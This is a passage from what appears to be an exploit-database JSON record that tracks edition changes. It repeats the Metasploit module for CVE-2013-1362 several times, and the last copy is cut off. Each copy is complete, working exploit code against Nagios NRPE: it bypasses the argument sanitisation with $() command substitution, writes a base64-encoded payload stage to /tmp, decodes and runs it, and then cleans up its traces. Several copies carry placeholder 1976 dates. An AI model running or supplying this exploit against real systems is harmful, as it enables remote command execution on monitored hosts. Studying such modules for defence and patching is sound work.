OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-23T13:51:05", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-28T09:55:40", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-28T09:55:40", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-28T09:55:40", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-28T21:54:37", "history": [], "viewCount": 87, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-28T21:54:37", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-28T21:54:37", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-29T23:57:07", "history": [], "viewCount": 87, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-29T23:57:07", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-29T23:57:07", "differentElements": ["modified", "published"], "edition": 60}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-30T03:56:25", "history": [], "viewCount": 92, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-30T03:56:25", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-30T03:56:25", "differentElements": ["modified", "published"], "edition": 61}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-06T14:12:56", "history": [], "viewCount": 93, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-06T14:12:56", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari 